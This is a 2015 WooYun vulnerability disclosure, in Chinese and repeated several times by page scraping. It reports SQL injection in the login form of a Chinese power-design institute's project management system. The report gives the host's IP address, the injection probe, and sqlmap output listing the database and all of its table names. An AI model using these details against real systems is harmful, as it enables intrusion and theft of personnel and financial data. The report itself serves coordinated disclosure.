中国能建下属单位工程管理集成系统sql注入漏洞

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105346

漏洞标题：中国能建下属单位工程管理集成系统sql注入漏洞

漏洞作者：路人甲

提交时间：2015-04-03 11:09

修复时间：2015-05-23 08:18

公开时间：2015-05-23 08:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-03：细节已通知厂商并且等待厂商处理中
2015-04-08：厂商已经确认，细节仅向厂商公开
2015-04-18：细节向核心白帽子及相关领域专家公开
2015-04-28：细节向普通白帽子公开
2015-05-08：细节向实习白帽子公开
2015-05-23：细节向公众公开

简要描述：

中国能建下属单位华北电力设计院有限公司工程管理集成系统存在sql注入漏洞。

详细说明：

中国能建下属单位华北电力设计院有限公司工程管理集成系统存在sql注入漏洞。

http://211.160.9.96:8080/

登陆窗口存在post型注入，直接上图：
在登陆框输入'and 1=1报sql语句错误。

直接sqlmap：数据库名

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: PowerPMDB
[390 tables]
+---------------------------------------+
| Attachment                            |
| Ext_PBDocDbs                          |
| Ext_PBDocFiles                        |
| Ext_PBDocFolder                       |
| Ext_PBHuman                           |
| Ext_PlnProject                        |
| Mat_Delivery                          |
| Mat_PurchaseDetail                    |
| NCPE_ApproachMaterialList             |
| NCPE_ApproachMaterialList             |
| NCPE_ApprovalFundsPlanList            |
| NCPE_ApprovalFundsPlanList            |
| NCPE_AssetInventory                   |
| NCPE_AttendRecordList                 |
| NCPE_AttendRecordList                 |
| NCPE_BelarusianBudget                 |
| NCPE_BudgetAccountsList               |
| NCPE_BudgetAccountsList               |
| NCPE_BudgetChangesList                |
| NCPE_BudgetChangesList                |
| NCPE_BudgetMaintain                   |
| NCPE_CarRefueling                     |
| NCPE_CarRepair                        |
| NCPE_CarsMaintenance                  |
| NCPE_CarsMaintenance                  |
| NCPE_CarsUse                          |
| NCPE_ChangesFixedAssList              |
| NCPE_ChangesFixedAssets               |
| NCPE_CollarPlanList                   |
| NCPE_CollarPlanList                   |
| NCPE_CommReimbSureList                |
| NCPE_CommReimbSureList                |
| NCPE_CommonReimbursement              |
| NCPE_ConstructionDrawBudgetList       |
| NCPE_ConstructionDrawBudgetList       |
| NCPE_ContainerRecordList              |
| NCPE_ContractRecPayApp                |
| NCPE_ContractRecPayDeducted           |
| NCPE_ControlMonthsPlanList            |
| NCPE_ControlMonthsPlanList            |
| NCPE_ControlQuarterPlanList           |
| NCPE_ControlQuarterPlanList           |
| NCPE_ControlYearsPlanList             |
| NCPE_ControlYearsPlanList             |
| NCPE_CostDocClass                     |
| NCPE_DocTransferSetList               |
| NCPE_DocTransferSetList               |
| NCPE_DrawingsRegistrationList         |
| NCPE_DrawingsRegistrationList         |
| NCPE_DrawingsRegistrationSub          |
| NCPE_DriverManagement                 |
| NCPE_EPCProjectProgressList           |
| NCPE_EPCProjectProgressList           |
| NCPE_EquMatInfoTransferList           |
| NCPE_EquMatInfoTransferList           |
| NCPE_EquipmentDebugg                  |
| NCPE_ExecuEstimateList                |
| NCPE_ExecuEstimateList                |
| NCPE_ExpPlanNodeList                  |
| NCPE_ExpReportMaterialsList           |
| NCPE_ExpReportNodeList                |
| NCPE_ExpeditingPlanList               |
| NCPE_ExpeditingPlanList               |
| NCPE_ExpeditingReport                 |
| NCPE_ExpenseDetailsList               |
| NCPE_ExpenseDetailsList               |
| NCPE_ExtraHoursList                   |
| NCPE_FixedAssetsPurList               |
| NCPE_FixedAssetsPurchase              |
| NCPE_FixedAssetsRegList               |
| NCPE_FixedAssetsRegister              |
| NCPE_ImpleBudgetList                  |
| NCPE_ImpleBudgetList                  |
| NCPE_ImportProjMonthList              |
| NCPE_ImportProjMonthList              |
| NCPE_InsurInformation                 |
| NCPE_IntoCountryApply                 |
| NCPE_IntoCountryApply                 |
| NCPE_IntoCountrySure                  |
| NCPE_IpManagementList                 |
| NCPE_IpManagementList                 |
| NCPE_LaborProStorageList              |
| NCPE_LaborProStorageList              |
| NCPE_LaborStorageGrantList            |
| NCPE_LaborStorageGrantList            |
| NCPE_LoanManagementList               |
| NCPE_LoanManagementList               |
| NCPE_MonthOutPutRecList               |
| NCPE_MonthOutPutRecList               |
| NCPE_MonthsFundsPlanList              |
| NCPE_MonthsFundsPlanList              |
| NCPE_MonthsPlan                       |
| NCPE_OfficeStorageList                |
| NCPE_OfficeStorageList                |
| NCPE_OfficeUseList                    |
| NCPE_OfficeUseList                    |
| NCPE_OrganizeList                     |
| NCPE_OutCountryApply                  |
| NCPE_OutCountryApply                  |
| NCPE_OutCountrySure                   |
| NCPE_PassportArchive                  |
| NCPE_PassportBorrow                   |
| NCPE_PassportDeplayList               |
| NCPE_PassportDeplayList               |
| NCPE_PassportFileManage               |
| NCPE_PassportInfor                    |
| NCPE_PassportReturn                   |
| NCPE_PayConfirm                       |
| NCPE_PaymentConfirm                   |
| NCPE_PaymentProve                     |
| NCPE_PersonnelAllocationList          |
| NCPE_PersonnelAllocationList          |
| NCPE_PleasePseudomonas                |
| NCPE_ProdValueCompletedList           |
| NCPE_ProdValueCompletedList           |
| NCPE_ProductionValuePlanList          |
| NCPE_ProductionValuePlanList          |
| NCPE_ProjectBaseInfo                  |
| NCPE_ProjectMonitorRptList            |
| NCPE_ProjectMonitorRptList            |
| NCPE_ProjectProgressList              |
| NCPE_ProjectProgressList              |
| NCPE_PurchaseSignContractChangeList   |
| NCPE_PurchaseSignContractChangeList   |
| NCPE_PurchaseSignContractChangeList   |
| NCPE_PurchaseSignContractList         |
| NCPE_QuaInspecAgencies                |
| NCPE_QuarterPlan                      |
| NCPE_QuarterReportIntro               |
| NCPE_QuarterReportIntro               |
| NCPE_QuarterReportList                |
| NCPE_RepaymentList                    |
| NCPE_RepaymentList                    |
| NCPE_ServiceContract                  |
| NCPE_ServiceLicense                   |
| NCPE_Storage                          |
| NCPE_StorageRecordList                |
| NCPE_SupPlanNodeList                  |
| NCPE_SupReportNodeList                |
| NCPE_SupervisionExtension             |
| NCPE_SupervisionNoticeList            |
| NCPE_SupervisionNoticeList            |
| NCPE_SupervisionPlanList              |
| NCPE_SupervisionPlanList              |
| NCPE_SupervisionReportList            |
| NCPE_SupervisionReportList            |
| NCPE_TransportationPlanList           |
| NCPE_TransportationPlanList           |
| NCPE_TravLoanManagementList           |
| NCPE_TravReimbSureList                |
| NCPE_TravReimbSureList                |
| NCPE_V_PaymentProve                   |
| NCPE_VisaInfor                        |
| NCPE_WorkinghoursList                 |
| NCPE_WorkinghoursList                 |
| NCPE_YearPlan                         |
| NIPRO_NIMAT_PaymentConfirm            |
| Ncpe_OfficeReturnList                 |
| Ncpe_OfficeReturnList                 |
| Ncpe_OffsetBorrowings                 |
| Ncpe_TravelReimbursementList          |
| Ncpe_TravelReimbursementList          |
| Ncpe_TravelReimbursementOther         |
| Nipro_Manage_Cont_Pay                 |
| Nipro_Manage_Cont_Rev                 |
| Nipro_jjms_docfolder                  |
| PACT_record                           |
| PB_BaseDataList                       |
| PB_BaseDataList                       |
| PB_BizAreaObject                      |
| PB_BizAreaObject                      |
| PB_BizObject                          |
| PB_CodeRuleList                       |
| PB_CodeRuleList                       |
| PB_ConfigRunTime                      |
| PB_ContractPay                        |
| PB_ContractPay                        |
| PB_DefaultField                       |
| PB_Department                         |
| PB_DocDBS                             |
| PB_DocFiles                           |
| PB_DocFolder                          |
| PB_Document                           |
| PB_EPSITAdmin                         |
| PB_EPSITAdmin                         |
| PB_EPSITMenu                          |
| PB_EPSManageOBS                       |
| PB_HisDataRecType                     |
| PB_HisDataTableField                  |
| PB_HisDataTableField                  |
| PB_HumanObject                        |
| PB_HumanObject                        |
| PB_HumanRelation                      |
| PB_HumanSign                          |
| PB_HumanTemp                          |
| PB_HumanUpLog                         |
| PB_Jobs                               |
| PB_Major                              |
| PB_Menu                               |
| PB_MenuWidget                         |
| PB_Messages                           |
| PB_Organize                           |
| PB_Position                           |
| PB_ReportData                         |
| PB_ReportData                         |
| PB_ReportForm                         |
| PB_RightCacheList                     |
| PB_RightCacheList                     |
| PB_RightCacheList                     |
| PB_RightTreeType                      |
| PB_Select                             |
| PB_Soft                               |
| PB_SyncContent                        |
| PB_SyncLog                            |
| PB_SyncServer                         |
| PB_Timer                              |
| PB_UserAdminEPSProj                   |
| PB_UserAdminEPSProj                   |
| PB_UserAdminMenu                      |
| PB_Widget                             |
| PB_Wizard                             |
| PI_MAT_SKJHMX_MIDDLE                  |
| PI_MAT_SKJH_MID                       |
| PI_MAT_SKSQMX_MIDDLE                  |
| PI_MAT_SKSQ_MID                       |
| PI_Mat_PaymentList                    |
| PI_Mat_PaymentList                    |
| PI_Mat_PlanToPaySchedule              |
| PI_Mat_PurchaseContract               |
| PI_Mat_PurchaseDetail                 |
| PI_NCPE_Collecting_money_apply_detail |
| PI_NCPE_Collecting_money_apply_detail |
| PI_NCPE_Collection_funds_plan_detail  |
| PI_NCPE_Collection_funds_plan_detail  |
| PI_NCPE_NIMAT_FKJHQC                  |
| PI_NCPE_NIMAT_MATFKJHMX               |
| PI_NCPE_NIMAT_MATFKJHMX               |
| PI_NCPE_NIMAT_MATFKSQ                 |
| PI_NCPE_NIMAT_cghtqcmx                |
| PI_NCPE_NIMAT_cghtqcmx                |
| PI_pln_matpay_detail                  |
| PI_pln_matpay_detail                  |
| PLN_ACTVCODE                          |
| PLN_ACTVTYPE                          |
| PLN_FILTPROP                          |
| PLN_PROJWBS                           |
| PLN_RSRC                              |
| PLN_TASKACTV                          |
| PLN_TASKFDBK                          |
| PLN_TASKMEMO                          |
| PLN_TASKPRED_Templet                  |
| PLN_TASKPRED_Templet                  |
| PLN_UDFTYPE                           |
| PLN_UDFVALUE                          |
| PLN_VIEWPROP                          |
| PLN_project_plan                      |
| PLN_project_plan                      |
| PLN_project_user_privilege            |
| PLN_task_Templet                      |
| PLN_task_Templet                      |
| POWERPLAN_DATA_version                |
| PO_BoxParts                           |
| PO_CashFundPlanList                   |
| PO_CashFundPlanList                   |
| PO_ConstrContStateList                |
| PO_ConstructionContState              |
| PO_ConstructionContractPI             |
| PO_ConstructionContractPI             |
| PO_ContractChangeList                 |
| PO_ContractChangeList                 |
| PO_CostProject                        |
| PO_CostSubClass                       |
| PO_DeliveryRecordList                 |
| PO_DeliveryRecordList                 |
| PO_EquClassification                  |
| PO_Equlist                            |
| PO_FetchRegistrationList              |
| PO_FetchRegistrationList              |
| PO_InspectionOnArrivalList            |
| PO_InspectionOnArrivalList            |
| PO_MatClassification                  |
| PO_Material                           |
| PO_OtherExpenses                      |
| PO_PayItemClass                       |
| PO_PayItemClass                       |
| PO_PaymentApplicationList             |
| PO_PaymentApplicationList             |
| PO_ProcurementBiddingList             |
| PO_ProcurementBiddingList             |
| PO_ProcurementChangeList              |
| PO_ProcurementChangeList              |
| PO_ProcurementPlanningList            |
| PO_ProcurementPlanningList            |
| PO_ProjectReportList                  |
| PO_ProjectReportList                  |
| PO_PurPaymentPlan                     |
| PO_PurchaseContractList               |
| PO_PurchaseContractList               |
| PO_PurchaseContractSub                |
| PO_PurchasePaymentList                |
| PO_PurchasePaymentList                |
| PO_PurchasePaymentPlanList            |
| PO_PurchasePaymentPlanList            |
| PO_RequisitionsList                   |
| PO_RequisitionsList                   |
| PO_StockInventoryList                 |
| PO_StockInventoryList                 |
| PO_StorageRecord                      |
| PaymentProveReport_View               |
| Rec_Right                             |
| STK_EQ_ASSORT                         |
| STK_MI_DETAIL                         |
| SYS_WinExportList                     |
| USER_list                             |
| V_CONT_LEDGER                         |
| WF_Engine                             |
| WF_EngineState                        |
| WF_Steps                              |
| WF_Task                               |
| calendar                              |
| costprojectClass_AW406W               |
| defaultfield_costprojectclass_aw406   |
| global_plan_send                      |
| jmis_doc_ddbs_AF1478IIW               |
| jmis_doc_ddi_AF1478IIW                |
| mpqin_right                           |
| mpqin_right                           |
| mpqinpw_infos                         |
| ncpe_contractrecpay_bak               |
| ncpe_contractrecpay_bak               |
| ncpe_doc_ddbs_handover                |
| ncpe_doc_ddi_handover                 |
| ncpe_docdbs_transfer                  |
| ncpe_document_transfer                |
| ncpe_to2400_cghtfkjh                  |
| ncpe_to2400_cghtfkjh                  |
| ncpe_to2400_gcht                      |
| ncpe_to2400_htsjfk                    |
| ncpe_to2400_jxht                      |
| ncpe_to2400_project                   |
| ncpe_v_TodoItems                      |
| nipro_v_collection                    |
| nipro_v_cont_c                        |
| nipro_v_cont_p                        |
| nipro_v_currency                      |
| nipro_v_customer                      |
| nipro_v_docattach                     |
| nipro_v_payment                       |
| pln_TASKRSRC                          |
| pln_plan_total_catelog                |
| pln_taskproc_templet                  |
| pln_taskproc_templet                  |
| po_purcnt                             |
| pp_ChartData                          |
| pp_KeyWordAttach                      |
| pp_KeyWordAttach                      |
| pp_Memo                               |
| pp_Module                             |
| pp_WinButton                          |
| pp_WinButton                          |
| pw_HisDataNodes                       |
| pw_InBox                              |
| pw_Infos                              |
| pw_Module                             |
| pw_Opinion                            |
| pw_PastNodes                          |
| pw_SysOpinion                         |
| pw_TransFeedBack                      |
| pw_TransFlowList                      |
| pw_TransFlowList                      |
| pw_TransInstanceForms                 |
| pw_TransInstanceForms                 |
| pw_TransInstanceList                  |
| pw_TransInstanceLog                   |
| pw_WorkFlowBookMarkList               |
| pw_WorkFlowBookMarkList               |
| pw_WorkFlowConfig                     |
| pw_WorkFlowKeyWord                    |
| pw_WorkFlowList                       |
| pw_WorkFlowVarList                    |
| pw_infoSubs                           |
| rec_attach                            |
| req_pi_result                         |
| view_CustomerAll                      |
| view_RecReport                        |
| view_collection_all                   |
| view_collection_all                   |
| view_collection_year                  |
| view_mat                              |
| workhour                              |
+---------------------------------------+

漏洞证明：

中国能建下属单位华北电力设计院有限公司工程管理集成系统存在sql注入漏洞。

http://211.160.9.96:8080/

登陆窗口存在post型注入，直接上图：
在登陆框输入'and 1=1报sql语句错误。

直接sqlmap：数据库名

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: PowerPMDB
[390 tables]
+---------------------------------------+
| Attachment                            |
| Ext_PBDocDbs                          |
| Ext_PBDocFiles                        |
| Ext_PBDocFolder                       |
| Ext_PBHuman                           |
| Ext_PlnProject                        |
| Mat_Delivery                          |
| Mat_PurchaseDetail                    |
| NCPE_ApproachMaterialList             |
| NCPE_ApproachMaterialList             |
| NCPE_ApprovalFundsPlanList            |
| NCPE_ApprovalFundsPlanList            |
| NCPE_AssetInventory                   |
| NCPE_AttendRecordList                 |
| NCPE_AttendRecordList                 |
| NCPE_BelarusianBudget                 |
| NCPE_BudgetAccountsList               |
| NCPE_BudgetAccountsList               |
| NCPE_BudgetChangesList                |
| NCPE_BudgetChangesList                |
| NCPE_BudgetMaintain                   |
| NCPE_CarRefueling                     |
| NCPE_CarRepair                        |
| NCPE_CarsMaintenance                  |
| NCPE_CarsMaintenance                  |
| NCPE_CarsUse                          |
| NCPE_ChangesFixedAssList              |
| NCPE_ChangesFixedAssets               |
| NCPE_CollarPlanList                   |
| NCPE_CollarPlanList                   |
| NCPE_CommReimbSureList                |
| NCPE_CommReimbSureList                |
| NCPE_CommonReimbursement              |
| NCPE_ConstructionDrawBudgetList       |
| NCPE_ConstructionDrawBudgetList       |
| NCPE_ContainerRecordList              |
| NCPE_ContractRecPayApp                |
| NCPE_ContractRecPayDeducted           |
| NCPE_ControlMonthsPlanList            |
| NCPE_ControlMonthsPlanList            |
| NCPE_ControlQuarterPlanList           |
| NCPE_ControlQuarterPlanList           |
| NCPE_ControlYearsPlanList             |
| NCPE_ControlYearsPlanList             |
| NCPE_CostDocClass                     |
| NCPE_DocTransferSetList               |
| NCPE_DocTransferSetList               |
| NCPE_DrawingsRegistrationList         |
| NCPE_DrawingsRegistrationList         |
| NCPE_DrawingsRegistrationSub          |
| NCPE_DriverManagement                 |
| NCPE_EPCProjectProgressList           |
| NCPE_EPCProjectProgressList           |
| NCPE_EquMatInfoTransferList           |
| NCPE_EquMatInfoTransferList           |
| NCPE_EquipmentDebugg                  |
| NCPE_ExecuEstimateList                |
| NCPE_ExecuEstimateList                |
| NCPE_ExpPlanNodeList                  |
| NCPE_ExpReportMaterialsList           |
| NCPE_ExpReportNodeList                |
| NCPE_ExpeditingPlanList               |
| NCPE_ExpeditingPlanList               |
| NCPE_ExpeditingReport                 |
| NCPE_ExpenseDetailsList               |
| NCPE_ExpenseDetailsList               |
| NCPE_ExtraHoursList                   |
| NCPE_FixedAssetsPurList               |
| NCPE_FixedAssetsPurchase              |
| NCPE_FixedAssetsRegList               |
| NCPE_FixedAssetsRegister              |
| NCPE_ImpleBudgetList                  |
| NCPE_ImpleBudgetList                  |
| NCPE_ImportProjMonthList              |
| NCPE_ImportProjMonthList              |
| NCPE_InsurInformation                 |
| NCPE_IntoCountryApply                 |
| NCPE_IntoCountryApply                 |
| NCPE_IntoCountrySure                  |
| NCPE_IpManagementList                 |
| NCPE_IpManagementList                 |
| NCPE_LaborProStorageList              |
| NCPE_LaborProStorageList              |
| NCPE_LaborStorageGrantList            |
| NCPE_LaborStorageGrantList            |
| NCPE_LoanManagementList               |
| NCPE_LoanManagementList               |
| NCPE_MonthOutPutRecList               |
| NCPE_MonthOutPutRecList               |
| NCPE_MonthsFundsPlanList              |
| NCPE_MonthsFundsPlanList              |
| NCPE_MonthsPlan                       |
| NCPE_OfficeStorageList                |
| NCPE_OfficeStorageList                |
| NCPE_OfficeUseList                    |
| NCPE_OfficeUseList                    |
| NCPE_OrganizeList                     |
| NCPE_OutCountryApply                  |
| NCPE_OutCountryApply                  |
| NCPE_OutCountrySure                   |
| NCPE_PassportArchive                  |
| NCPE_PassportBorrow                   |
| NCPE_PassportDeplayList               |
| NCPE_PassportDeplayList               |
| NCPE_PassportFileManage               |
| NCPE_PassportInfor                    |
| NCPE_PassportReturn                   |
| NCPE_PayConfirm                       |
| NCPE_PaymentConfirm                   |
| NCPE_PaymentProve                     |
| NCPE_PersonnelAllocationList          |
| NCPE_PersonnelAllocationList          |
| NCPE_PleasePseudomonas                |
| NCPE_ProdValueCompletedList           |
| NCPE_ProdValueCompletedList           |
| NCPE_ProductionValuePlanList          |
| NCPE_ProductionValuePlanList          |
| NCPE_ProjectBaseInfo                  |
| NCPE_ProjectMonitorRptList            |
| NCPE_ProjectMonitorRptList            |
| NCPE_ProjectProgressList              |
| NCPE_ProjectProgressList              |
| NCPE_PurchaseSignContractChangeList   |
| NCPE_PurchaseSignContractChangeList   |
| NCPE_PurchaseSignContractChangeList   |
| NCPE_PurchaseSignContractList         |
| NCPE_QuaInspecAgencies                |
| NCPE_QuarterPlan                      |
| NCPE_QuarterReportIntro               |
| NCPE_QuarterReportIntro               |
| NCPE_QuarterReportList                |
| NCPE_RepaymentList                    |
| NCPE_RepaymentList                    |
| NCPE_ServiceContract                  |
| NCPE_ServiceLicense                   |
| NCPE_Storage                          |
| NCPE_StorageRecordList                |
| NCPE_SupPlanNodeList                  |
| NCPE_SupReportNodeList                |
| NCPE_SupervisionExtension             |
| NCPE_SupervisionNoticeList            |
| NCPE_SupervisionNoticeList            |
| NCPE_SupervisionPlanList              |
| NCPE_SupervisionPlanList              |
| NCPE_SupervisionReportList            |
| NCPE_SupervisionReportList            |
| NCPE_TransportationPlanList           |
| NCPE_TransportationPlanList           |
| NCPE_TravLoanManagementList           |
| NCPE_TravReimbSureList                |
| NCPE_TravReimbSureList                |
| NCPE_V_PaymentProve                   |
| NCPE_VisaInfor                        |
| NCPE_WorkinghoursList                 |
| NCPE_WorkinghoursList                 |
| NCPE_YearPlan                         |
| NIPRO_NIMAT_PaymentConfirm            |
| Ncpe_OfficeReturnList                 |
| Ncpe_OfficeReturnList                 |
| Ncpe_OffsetBorrowings                 |
| Ncpe_TravelReimbursementList          |
| Ncpe_TravelReimbursementList          |
| Ncpe_TravelReimbursementOther         |
| Nipro_Manage_Cont_Pay                 |
| Nipro_Manage_Cont_Rev                 |
| Nipro_jjms_docfolder                  |
| PACT_record                           |
| PB_BaseDataList                       |
| PB_BaseDataList                       |
| PB_BizAreaObject                      |
| PB_BizAreaObject                      |
| PB_BizObject                          |
| PB_CodeRuleList                       |
| PB_CodeRuleList                       |
| PB_ConfigRunTime                      |
| PB_ContractPay                        |
| PB_ContractPay                        |
| PB_DefaultField                       |
| PB_Department                         |
| PB_DocDBS                             |
| PB_DocFiles                           |
| PB_DocFolder                          |
| PB_Document                           |
| PB_EPSITAdmin                         |
| PB_EPSITAdmin                         |
| PB_EPSITMenu                          |
| PB_EPSManageOBS                       |
| PB_HisDataRecType                     |
| PB_HisDataTableField                  |
| PB_HisDataTableField                  |
| PB_HumanObject                        |
| PB_HumanObject                        |
| PB_HumanRelation                      |
| PB_HumanSign                          |
| PB_HumanTemp                          |
| PB_HumanUpLog                         |
| PB_Jobs                               |
| PB_Major                              |
| PB_Menu                               |
| PB_MenuWidget                         |
| PB_Messages                           |
| PB_Organize                           |
| PB_Position                           |
| PB_ReportData                         |
| PB_ReportData                         |
| PB_ReportForm                         |
| PB_RightCacheList                     |
| PB_RightCacheList                     |
| PB_RightCacheList                     |
| PB_RightTreeType                      |
| PB_Select                             |
| PB_Soft                               |
| PB_SyncContent                        |
| PB_SyncLog                            |
| PB_SyncServer                         |
| PB_Timer                              |
| PB_UserAdminEPSProj                   |
| PB_UserAdminEPSProj                   |
| PB_UserAdminMenu                      |
| PB_Widget                             |
| PB_Wizard                             |
| PI_MAT_SKJHMX_MIDDLE                  |
| PI_MAT_SKJH_MID                       |
| PI_MAT_SKSQMX_MIDDLE                  |
| PI_MAT_SKSQ_MID                       |
| PI_Mat_PaymentList                    |
| PI_Mat_PaymentList                    |
| PI_Mat_PlanToPaySchedule              |
| PI_Mat_PurchaseContract               |
| PI_Mat_PurchaseDetail                 |
| PI_NCPE_Collecting_money_apply_detail |
| PI_NCPE_Collecting_money_apply_detail |
| PI_NCPE_Collection_funds_plan_detail  |
| PI_NCPE_Collection_funds_plan_detail  |
| PI_NCPE_NIMAT_FKJHQC                  |
| PI_NCPE_NIMAT_MATFKJHMX               |
| PI_NCPE_NIMAT_MATFKJHMX               |
| PI_NCPE_NIMAT_MATFKSQ                 |
| PI_NCPE_NIMAT_cghtqcmx                |
| PI_NCPE_NIMAT_cghtqcmx                |
| PI_pln_matpay_detail                  |
| PI_pln_matpay_detail                  |
| PLN_ACTVCODE                          |
| PLN_ACTVTYPE                          |
| PLN_FILTPROP                          |
| PLN_PROJWBS                           |
| PLN_RSRC                              |
| PLN_TASKACTV                          |
| PLN_TASKFDBK                          |
| PLN_TASKMEMO                          |
| PLN_TASKPRED_Templet                  |
| PLN_TASKPRED_Templet                  |
| PLN_UDFTYPE                           |
| PLN_UDFVALUE                          |
| PLN_VIEWPROP                          |
| PLN_project_plan                      |
| PLN_project_plan                      |
| PLN_project_user_privilege            |
| PLN_task_Templet                      |
| PLN_task_Templet                      |
| POWERPLAN_DATA_version                |
| PO_BoxParts                           |
| PO_CashFundPlanList                   |
| PO_CashFundPlanList                   |
| PO_ConstrContStateList                |
| PO_ConstructionContState              |
| PO_ConstructionContractPI             |
| PO_ConstructionContractPI             |
| PO_ContractChangeList                 |
| PO_ContractChangeList                 |
| PO_CostProject                        |
| PO_CostSubClass                       |
| PO_DeliveryRecordList                 |
| PO_DeliveryRecordList                 |
| PO_EquClassification                  |
| PO_Equlist                            |
| PO_FetchRegistrationList              |
| PO_FetchRegistrationList              |
| PO_InspectionOnArrivalList            |
| PO_InspectionOnArrivalList            |
| PO_MatClassification                  |
| PO_Material                           |
| PO_OtherExpenses                      |
| PO_PayItemClass                       |
| PO_PayItemClass                       |
| PO_PaymentApplicationList             |
| PO_PaymentApplicationList             |
| PO_ProcurementBiddingList             |
| PO_ProcurementBiddingList             |
| PO_ProcurementChangeList              |
| PO_ProcurementChangeList              |
| PO_ProcurementPlanningList            |
| PO_ProcurementPlanningList            |
| PO_ProjectReportList                  |
| PO_ProjectReportList                  |
| PO_PurPaymentPlan                     |
| PO_PurchaseContractList               |
| PO_PurchaseContractList               |
| PO_PurchaseContractSub                |
| PO_PurchasePaymentList                |
| PO_PurchasePaymentList                |
| PO_PurchasePaymentPlanList            |
| PO_PurchasePaymentPlanList            |
| PO_RequisitionsList                   |
| PO_RequisitionsList                   |
| PO_StockInventoryList                 |
| PO_StockInventoryList                 |
| PO_StorageRecord                      |
| PaymentProveReport_View               |
| Rec_Right                             |
| STK_EQ_ASSORT                         |
| STK_MI_DETAIL                         |
| SYS_WinExportList                     |
| USER_list                             |
| V_CONT_LEDGER                         |
| WF_Engine                             |
| WF_EngineState                        |
| WF_Steps                              |
| WF_Task                               |
| calendar                              |
| costprojectClass_AW406W               |
| defaultfield_costprojectclass_aw406   |
| global_plan_send                      |
| jmis_doc_ddbs_AF1478IIW               |
| jmis_doc_ddi_AF1478IIW                |
| mpqin_right                           |
| mpqin_right                           |
| mpqinpw_infos                         |
| ncpe_contractrecpay_bak               |
| ncpe_contractrecpay_bak               |
| ncpe_doc_ddbs_handover                |
| ncpe_doc_ddi_handover                 |
| ncpe_docdbs_transfer                  |
| ncpe_document_transfer                |
| ncpe_to2400_cghtfkjh                  |
| ncpe_to2400_cghtfkjh                  |
| ncpe_to2400_gcht                      |
| ncpe_to2400_htsjfk                    |
| ncpe_to2400_jxht                      |
| ncpe_to2400_project                   |
| ncpe_v_TodoItems                      |
| nipro_v_collection                    |
| nipro_v_cont_c                        |
| nipro_v_cont_p                        |
| nipro_v_currency                      |
| nipro_v_customer                      |
| nipro_v_docattach                     |
| nipro_v_payment                       |
| pln_TASKRSRC                          |
| pln_plan_total_catelog                |
| pln_taskproc_templet                  |
| pln_taskproc_templet                  |
| po_purcnt                             |
| pp_ChartData                          |
| pp_KeyWordAttach                      |
| pp_KeyWordAttach                      |
| pp_Memo                               |
| pp_Module                             |
| pp_WinButton                          |
| pp_WinButton                          |
| pw_HisDataNodes                       |
| pw_InBox                              |
| pw_Infos                              |
| pw_Module                             |
| pw_Opinion                            |
| pw_PastNodes                          |
| pw_SysOpinion                         |
| pw_TransFeedBack                      |
| pw_TransFlowList                      |
| pw_TransFlowList                      |
| pw_TransInstanceForms                 |
| pw_TransInstanceForms                 |
| pw_TransInstanceList                  |
| pw_TransInstanceLog                   |
| pw_WorkFlowBookMarkList               |
| pw_WorkFlowBookMarkList               |
| pw_WorkFlowConfig                     |
| pw_WorkFlowKeyWord                    |
| pw_WorkFlowList                       |
| pw_WorkFlowVarList                    |
| pw_infoSubs                           |
| rec_attach                            |
| req_pi_result                         |
| view_CustomerAll                      |
| view_RecReport                        |
| view_collection_all                   |
| view_collection_all                   |
| view_collection_year                  |
| view_mat                              |
| workhour                              |
+---------------------------------------+

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-04-08 08:16

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT向国家能源局信息中心通报，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105346

漏洞标题：中国能建下属单位工程管理集成系统sql注入漏洞

相关厂商：中国能建

漏洞作者：路人甲

提交时间：2015-04-03 11:09

修复时间：2015-05-23 08:18

公开时间：2015-05-23 08:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0105346

漏洞标题：中国能建下属单位工程管理集成系统sql注入漏洞

相关厂商：中国能建

漏洞作者： 路人甲

提交时间：2015-04-03 11:09

修复时间：2015-05-23 08:18

公开时间：2015-05-23 08:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0105346"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云